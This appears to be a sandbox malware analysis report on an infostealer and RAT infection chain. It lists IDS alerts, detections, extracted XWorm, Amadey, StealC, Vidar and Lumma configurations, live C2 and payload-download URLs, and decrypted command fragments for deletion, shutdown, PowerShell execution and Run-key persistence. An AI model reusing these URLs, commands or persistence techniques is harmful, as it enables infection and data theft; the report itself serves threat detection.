2025-02-01T16:59:58.509298+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.618496+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.728222+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.837305+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.951776+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.056432+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.172518+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.280665+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.388915+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.496607+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.605888+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.711463+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.827263+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T17:00:13.080420+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54894	91.212.166.99	4404	TCP
2025-02-01T17:00:27.777114+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54894	91.212.166.99	4404	TCP
2025-02-01T17:00:43.561727+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54894	91.212.166.99	4404	TCP
2025-02-01T17:00:58.884606+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54894	91.212.166.99	4404	TCP
2025-02-01T17:01:09.892113+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54894	91.212.166.99	4404	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:00:22.046479+0100	2852874	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP
2025-02-01T17:00:35.835019+0100	2852874	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP
2025-02-01T17:01:08.432053+0100	2852874	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:59:53.904002+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.027361+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.137647+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.246028+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.362388+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.479865+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.587517+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.704358+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.823170+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.930343+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.041409+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.154623+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.264074+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.376715+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.484587+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.592330+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.718366+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.828761+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.935912+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.045189+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.156911+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.264833+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.373521+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.495466+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.608381+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.717112+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.838148+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.950497+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.068412+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.184898+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.294959+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.398084+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.524631+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.633646+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.743073+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.854254+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.964266+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.072292+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.181702+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.290033+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.399462+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.509298+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.618496+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.728222+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.837305+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.951776+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.056432+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.172518+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.280665+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.388915+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.496607+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.605888+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.711463+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:59.827263+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:00:27.546083+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.5	54894	91.212.166.99	4404	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:59:52.499565+0100	2853191	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:59:47.226588+0100	2853192	1	Malware Command and Control Activity Detected	192.168.2.5	54894	91.212.166.99	4404	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DbCMTMgeJo.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.115/IFD	Avira URL Cloud: Label: malware
Source: http://185.215.113.97/files/initlosizz198hyjdr/random.exe/	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php/J	Avira URL Cloud: Label: malware
Source: http://185.215.113.97/files/fate/random.exe	Avira URL Cloud: Label: malware
Source: https://getyour.cyou/d	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpnu	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php(	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php/	Avira URL Cloud: Label: malware
Source: http://185.215.113.97/files/initlosizz198hyjdr/random.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.115	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php9	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php4	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpded	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpF	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["91.212.166.99"], "Port": 4404, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: 0000002E.00000002.3164079582.00000000035D7000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199820567237", "Botnet": "hac22tl"}
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.6056.3.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.115/c4becf79229cb002.php", "Botnet": "kira"}
Source: DbCMTMgeJo.exe.3812.0.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": "https://warlikedbeliev.org/api", "Build Version": "PsFKDg--pablo"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Roaming\is-1MO68.tmp	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)	ReversingLabs: Detection: 83%

Multi AV Scanner detection for submitted file

Source: DbCMTMgeJo.exe	Virustotal: Detection: 55%			Perma Link
Source: DbCMTMgeJo.exe	ReversingLabs: Detection: 55%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: DbCMTMgeJo.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp	String decryptor: 91.212.166.99
Source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp	String decryptor: 4404
Source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp	String decryptor: USB.exe
Source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp	String decryptor: %LocalAppData%
Source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp	String decryptor: dllhost.exe
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 185.215.113.43
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abc3bc1985
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: skotes.exe
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random

Source: DbCMTMgeJo.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ratty Jellyfish_is1

Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.5:54735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:54736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:54747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.5:54748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:54905 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.5:54907 version: TLS 1.2

Source:	Binary string: Chicken.pdb source: c153ad0ce0.exe, 00000008.00000002.2984332143.0000000004179000.00000004.00000800.00020000.00000000.sdmp, c153ad0ce0.exe, 00000008.00000000.2747691872.0000000000D52000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: 21aaa725bd.tmp, 0000001E.00000003.2926150194.0000000003508000.00000004.00001000.00020000.00000000.sdmp, 21aaa725bd.tmp, 0000001E.00000003.2923189611.00000000031D0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\36469\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\36469

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49750 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:54710 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059755 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thebeautylovelytop .top) : 192.168.2.5:64635 -> 1.1.1.1:53
